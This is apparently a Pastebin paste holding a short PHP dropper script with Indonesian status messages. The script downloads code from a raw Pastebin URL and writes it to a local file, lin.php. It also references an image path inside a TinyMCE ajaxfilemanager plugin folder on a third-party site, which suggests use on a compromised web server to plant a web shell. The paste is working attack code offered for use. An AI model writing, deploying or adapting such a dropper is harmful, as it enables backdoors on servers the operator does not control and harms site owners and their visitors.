khaclep007

hello

May 14th, 2018
161
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.40 KB | None | 0 0
  1. <?php
  2. $b = <<<END
  3. http://dimaggio.com/js/tiny_mce_new/plugins/ajaxfilemanager/inc/Picsay.jpg
  4. END;
  5. $c = <<<END
  6. https://pastebin.com/raw/9FLLy960
  7. END;
  8.  
  9.  
  10.  
  11.  
  12.  
  13. $a = <<<END
  14. a
  15. END;
  16.  
  17. $aduh = <<<END
  18. lin.php
  19. END;
  20.  
  21.  
  22.  
  23. $asu = file_get_contents($c);
  24. $data = file_put_contents($aduh,$asu);
  25. if($asu){
  26. echo <<<END
  27. sukses Get konten<br>
  28. END;
  29. }
  30. if($data){
  31. echo <<<END
  32. Sukses Put konten<br>
  33. END;
  34. }
  35. ?>
Advertisement
Add Comment
Please, Sign In to add comment